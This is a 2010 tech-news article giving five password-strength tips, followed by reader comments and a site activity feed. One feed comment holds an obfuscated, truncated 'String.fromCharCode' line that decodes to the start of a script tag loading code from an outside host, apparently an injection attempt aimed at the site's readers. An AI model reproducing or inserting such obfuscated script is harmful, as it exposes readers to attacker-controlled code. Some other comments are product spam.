5 tips to create strong passwords

 

Summary

Employees can be conscientious in protecting enterprise IT integrity by using simple, secure steps to generate strong passwords, says executive.

Events

Social Media World Forum
22 - 23 Sep 2010

Suntec, Singapore

Asia CXO Leadership Summit - Singapore
7 Sep 2010

Marriott Hotel, Singapore

Governmentware 2010
28 - 30 Sep 2010

Suntec, Singapore

The 5th Annual CIO Forum Asia
28 Sep 2010

Singapore

IDC's Asia/Pacific Cloud Computing Conference 2010
31 Aug 2010

Marriott Hotel, Singapore

Enterprises looking to maintain IT infrastructure integrity and deter hackers from attacking employees' passwords, can tap software and simple guidelines to generate secure passwords, according to a security specialist.

Ronnie Ng, Symantec's manager of systems engineering in Singapore and Indonesia, noted that there are systems and configuration management software, which include components and policies that allow IT administrators to enforce strong password guidelines within the organization.

Recent security incidents have stepped up the need for robust secret code. Last month, 20,000 passwords obtained from a phishing scam turned up on a third-party Web site, revealing login credentials to Windows Live Hotmail, Gmail and Yahoo Mail accounts, among others. A subsequent analysis of the compromised passwords revealed that many users were tardy in creating secure passwords.

Viruses such as Conficker and Gumblar, have already attacked the IT infrastructure of organizations such as the Australia and New Zealand Banking Group.

With these in mind, here are five considerations to strengthen passwords and the password-generating process, for both work and play.

  • Use tools that automatically generate random passwords
    IT professionals, Symantec's Ng noted, should make use of business software that allow the automatic generation of random passwords based on a fixed schedule.

    "So even if a certain password somehow becomes compromised, it will only be good until the randomization expires, and it will only apply to [a] particular computer," said Ng.

  • Use alphanumeric characters and unique symbols to create stronger passwords
    Alphanumeric characters with a mixture of upper and lower case letters, numbers and symbols, will make it tough for hackers to crack. Employing this approach will make passwords "as meaningless and random as possible", according to Ng.

    Tech author and columnist J.D. Biersdorfer, noted in a video for the New York Times that such characters and symbols should also be worked into the answers of your challenge questions.

  • Instead of mnemonics, try a 'pass-phrase'
    Researchers at the Carnegie Mellon University in the United States have found out that using mnemonics, which require users to generate a password using the first letter of every word in a sentence, are not as secure as initially thought.

    According to a Newsweek article, 144 volunteers were each asked to create a mnemonic password in a study conducted in 2006. The researchers then built a simple program to scour the Web for famous quotes, ad slogans, song lyrics and nursery rhymes, amassing 249,000 entries. Using this list, which is a relatively small universe of phrases in the security field, the researchers cracked 4 percent of the group's mnemonic passwords, proving that this method has its fallibility.

    Far more secure are pass-phrases such as "du-bi-du-bi-dub", which would withstand a brute force attack--in which a hacker attempts "a," then "ab", then "abc", and so on--for "531,855,448,467 years", according to the report. So think long, but easy to remember phrases, the next time you generate a password.

  • Change passwords periodically
    According to Symantec's Ng, organizations should incorporate system prompts to alert employees to change their password every 45 to 60 days. Frequent password changes result in higher security, making it more difficult for intruders to access company data using outdated passwords. "But do strike a balance as overly frequent changes may hinder productivity," he noted.
  • Avoid generating passwords using personal information
    Internet users have a common headache: there are too many passwords to remember. Today, with Web-based email programs, Internet banking accounts, instant messaging tools, and corporate office computers among some of the more common systems or equipment requiring a password to authenticate entry, it is hard work for users to remember all their passwords.

    However, users should not base passwords on the convenience of their personal information, Ng pointed out. Such data include names, nicknames and birth dates.

    Former Governor of Alaska in the U.S., Sarah Palin, is a cautionary tale. Last year, her personal e-mail account was hacked into by a student, who simply searched the Web to find out Palin's birth date, postal code and where she had met her husband to crack her security code.

Talkback

5 tips to create strong passwords

Nice tips! For my comfort and saving time, I am using Sticky Password Manager - it also includes password generator, which creates strong passwords. And there are many password manager tools on the market.

http://www.stickypassword.com

Jerry Spring December 1st, 2009 Reply

wonderful article,but if you forget admin password or lost admin password?
there is a popular solution for those who have been locked out by computer. For this solution, what you need id a second computer that can link to Internet ,Google Windows Password Recovery 6.0 for password recovery. Download and install the software on that computer.
With Windows Password Recovery 6.0, you can create a reset CD which can be multiple used to reset windows admin password without erasing anything.

Maggiechen July 21st, 2010 Reply
Add your opinion

In order to post a comment, you need to be registered. (Sign In or register below)

Post your comment
HP Data Protector delivers high-performance data protection at up to 70% lower TCO.
Tech Vendor: HP
Did you know?
Did you know?

ZDNet Asia Live

I suggest that the «break» in the recent trend of developments in browser market share observed by Net Applications is an artifact of t...

55 seconds ago by mhenriday on IE slips in usage share; Chrome resumes growth

Samsung Galaxy Tab http://www.zdnetasia.c...

15 minutes ago by azurimalik on topsy

RT @zdnetasia: SD revamp to triple flash card speeds in 2012 http://bit.ly/d5QlHD

27 minutes ago by amine5a on topsy

Texas opens antitrust investigation of Google http://bit.ly/bjMQ7J | #Droid #Android

Asia News - SD revamp to triple flash card speeds in 2012: The SD Association should rev its fla... http://bit.ly/a5isKD - #AsiaToday #News

UN exec: Cyberwar could be 'worse than tsunami' http://bit.ly/alV2dB #SMO

#Software UN exec: Cyberwar could be 'worse than tsunami': #Software Rally Software Development on ZDNet Asia: ZDN... http://bit.ly/dwqy7v

UN exec: Cyberwar could be 'worse than tsunami' http://bit.ly/aHYDVc #Android #news

UN exec: Cyberwar could be 'worse than tsunami': By David Meyer, ZDNet UK on September 6, 2010 (3 minutes ago) Pro... http://bit.ly/bTnxhB

Asia News - U.N. exec: Cyberwar could be 'worse than tsunami': Proposal for a global "cyberpeace... http://bit.ly/c3jCv8 - #AsiaToday #News

1 hour 20 minutes ago by asiatodaynews on topsy

Asia News - Google settles Buzz lawsuit for US$8.5M: Internet privacy groups will be the benefic... http://bit.ly/dg0FSU - #AsiaToday #News

1 hour 20 minutes ago by asiatodaynews on topsy

Google settles Buzz lawsuit for US$8.5M http://bit.ly/a6xX2z | #Droid #Android

1 hour 27 minutes ago by droid_phone on topsy

Sadly still "talking" & not what's been successful RT @MarketingEds: $1.8B potential for location-based advertising http://bit.ly/dhllCC

SingTel brings social media monitoring tool to SMBs - Software - News http://bit.ly/bc5kLv (Hmm....?)

iPad apps for enterprise users ~ http://bit.ly/as3LP3

#Software Rally Software Development on ZDNet Asia: ZDNet / Topics / Rally Software Development. Rally Software De... http://bit.ly/cedVF1

Should I d/l Angry Bird for Android (it's out!), risking wrinkles frm overplaying? See @zdnetasia's sister site's take http://bit.ly/bwdGR7

Er! Isn't Windows the thing I open when I need more air in the room? :) More seriously, Linux will require more time against the marketi...

20 hours 16 minutes ago by commtech on 10 reasons why Linux will oust Windows

Korean phone makers rank among greenest: Korean phone makers LG and Samsung have managed to rank among the top fiv... http://bit.ly/aIHEuz

RT @adtrend: $1.8B potential for location-based advertising: Location-based advertising is still in its infancy, but come 2015,... http://bit.ly/aKBpOx

RT @adtrend: $1.8B potential for location-based advertising: Location-based advertising is still in its infancy, but come 2015,... http://bit.ly/aKBpOx

I guess MySpace is losing its popularity worldwide.

1 day 7 minutes ago by fanaticore on Facebook top social networking site in India

Thank you all so much for your comments and support


malaysia

1 day 1 minute ago by whiyney on DiGi offers mobile TV

can u provide me with a bit more details abut cellonics whether its been implemented or not?
my email id is electromaniac21@yahoo.com

1 day 12 minutes ago by ayaz21 on Data transfer 1,000 times faster?

At least the train is turning toward the right track. I have to get the methodology worked out. Navigators are great but I have a tend...

2 days 26 minutes ago by texasjustice on Define your project's vision with this exercise

document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,103,101,109,98,104,101,108,46,5...

2 days 3 minutes ago by gembhel on Can a contract be concluded by e-mail?

Hi, I came to know about ValleSpeak MPP Viewer from one of my friend, and i started using it. It is very good and it's easy to use and co...

2 days 30 minutes ago by shalonmiller on Agile drivers for new project management tools

People around the world today are using smart cards for debit and credit payments. Contactless payment applications are gaining momentum ...

2 days 36 minutes ago by simagetechnolgies on Contactless payment industry hit with growth pains

need more

2 days 13 minutes ago by jepsy on Is it too late to introduce 3G in India?

I recommend checking 5pm for a good project management tool. (www.5pmweb.com). It makes the team collaboration easy and is friendly enou...

3 days 31 minutes ago by Erica on Agile drivers for new project management tools

I am a student researching piracy for my computer course. My mother owns an epublishing company. Ebook piracy is also a huge problem in h...

3 days 44 minutes ago by tasha6669 on SaaS no silver bullet for piracy

For more information regarding the lawsuit and the patents involved, check out Sunlight Research's upcoming webinar "Will Oracle’s Java...

3 days 9 minutes ago by Sunlight on Legal woes no impact on Android ecosystem yet

Google search does not seem to be made for 5 years old kids,anyway your child will learn to say and understand the meaning of this senten...

3 days 23 minutes ago by irajjs on Facing reality from a Google search about Echo of Amboseli

But iTunes music does not apply to Asia. We STILL CAN'T BUY music from iTunes!!!

4 days 12 minutes ago by maxxtotal on Study: Music, not apps, rules iTunes